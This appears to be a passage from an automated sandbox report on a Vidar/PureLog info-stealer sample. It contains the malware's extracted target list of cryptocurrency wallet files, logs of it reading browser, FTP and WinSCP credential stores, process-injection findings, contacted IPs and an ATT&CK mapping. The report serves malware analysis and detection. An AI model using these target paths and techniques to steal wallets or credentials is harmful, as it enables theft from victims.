Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Opens network shares
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\config\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\config\Jump to behavior
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.5a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D01A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6D01A0C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD10C40 sqlite3_bind_zeroblob,1_2_6CD10C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD10D60 sqlite3_bind_parameter_name,1_2_6CD10D60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC38EA0 sqlite3_clear_bindings,1_2_6CC38EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD10B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6CD10B40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC36410 bind,WSAGetLastError,1_2_6CC36410
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC360B0 listen,WSAGetLastError,1_2_6CC360B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,1_2_6CC3C050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC36070 PR_Listen,1_2_6CC36070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3C030 sqlite3_bind_parameter_count,1_2_6CC3C030

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		Boot or Logon Initialization Scripts411
                    Process Injection                    		11
                    Deobfuscate/Decode Files or Information                    		1
                    Credentials in Registry                    		1
                    Account Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information                    		Security Account Manager4
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Timestomp                    		NTDS55
                    System Information Discovery                    		Distributed Component Object ModelInput Capture114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Network Share Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials151
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
                    Process Injection                    		Proc Filesystem12
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447066 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 24/05/2024 Architecture: WINDOWS Score: 100 35 steamcommunity.com 2->35 37 fp2e7a.wpc.phicdn.net 2->37 39 fp2e7a.wpc.2be4.phicdn.net 2->39 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 10 other signatures 2->51 8 SecuriteInfo.com.Win32.Malware-gen.198.6512.exe 2 2->8         started        signatures3 process4 file5 25 C:\Users\user\AppData\...\Protect544cd51a.dll, PE32 8->25 dropped 53 Found many strings related to Crypto-Wallets (likely being stolen) 8->53 55 Writes to foreign memory regions 8->55 57 Allocates memory in foreign processes 8->57 59 Injects a PE file into a foreign processes 8->59 12 MSBuild.exe 1 45 8->12         started        17 WerFault.exe 21 16 8->17         started        19 conhost.exe 8->19         started        21 timeout.exe 1 8->21         started        signatures6 process7 dnsIp8 41 steamcommunity.com 23.199.218.33, 443, 49732 AKAMAI-ASUS United States 12->41 43 78.47.123.174, 443, 49734, 49737 HETZNER-ASDE Germany 12->43 27 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->27 dropped 29 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->29 dropped 31 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->31 dropped 33 10 other files (none is malicious) 12->33 dropped 61 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->61 63 Found many strings related to Crypto-Wallets (likely being stolen) 12->63 65 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->65 67 6 other signatures 12->67 23 cmd.exe 1 12->23         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.Malware-gen.198.6512.exe34%ReversingLabsWin32.Trojan.Casdet
                    SecuriteInfo.com.Win32.Malware-gen.198.6512.exe38%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\AFCBAEBAEBFH\freebl3.dll0%ReversingLabs
                    C:\ProgramData\AFCBAEBAEBFH\mozglue.dll0%ReversingLabs
                    C:\ProgramData\AFCBAEBAEBFH\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\AFCBAEBAEBFH\nss3.dll0%ReversingLabs
                    C:\ProgramData\AFCBAEBAEBFH\softokn3.dll0%ReversingLabs
                    C:\ProgramData\AFCBAEBAEBFH\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    steamcommunity.com0%VirustotalBrowse
                    fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE0%URL Reputationsafe
                    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%URL Reputationsafe
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=0%URL Reputationsafe
                    http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;0%URL Reputationsafe
                    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
